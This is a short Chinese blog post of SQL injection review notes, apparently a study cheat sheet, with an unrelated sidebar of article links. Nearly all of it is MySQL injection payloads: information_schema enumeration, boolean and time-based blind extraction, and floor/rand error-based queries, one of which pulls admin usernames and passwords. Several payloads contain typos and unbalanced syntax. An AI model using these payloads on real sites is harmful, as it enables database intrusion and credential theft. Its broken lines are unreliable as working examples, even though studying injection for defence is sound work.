zoukankan      html  css  js  c++  java
  • 注入复习总结

    注入复习笔记

     1 #常规注入:
     2 select schema_name from information_schema.schemata;
     3 select group_concat(table_name) from information_schema.tables where table_schema=0x73716C696E6A656374;
     4 select group_concat(column_name) from information_schema.columns where table_schema=0x73716C696E6A656374;
     5 #盲注:
     6 select and ascii(mid(databases(),1,1))=115;
     7 select and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1));
     8 select and ascii(substring((select columns_name from information_schema.columns where column_schena=database() limit 1,1),1,1));
     9 #延时盲注:
    10 select and if(ascii(substring(database(),1,)),sleep(10),1);
    11 select and if(ascii(substring((select table_name from information_schema.tables where table_schema=0x73716C696E6A656374),sleep(10),1));
    12 select and if(ascii(substring((select columns_name from information_schema.columns where column_schema=0x73716C696E6A656374)),1,1),sleep(10),1);
    13 #floor报错注入
    14 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
    15 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
    16 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
    17 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

    注入复习总结

  • 相关阅读:
    C#入门
    使用 OLEDB 及 SqlBulkCopy 将多个不在同一文件夹下的 ACCESS mdb 数据文件导入MSSQL
    aspose.word 读取word段落内容
    Jquery+Aajax 批量上传
    asp.net mvc web api Token验证
    iframe父页面和子页面获取元素和js变量
    JavaScrpt常用的封装方法
    ASP.NET MVC 导出Word报表
    Asp.net的对Excel文档的导入导出操作
    C++ 复制vector值到array,复制 array 到jintArray
  • 原文地址:https://www.cnblogs.com/nul1/p/8743319.html
Copyright © 2011-2022 走看看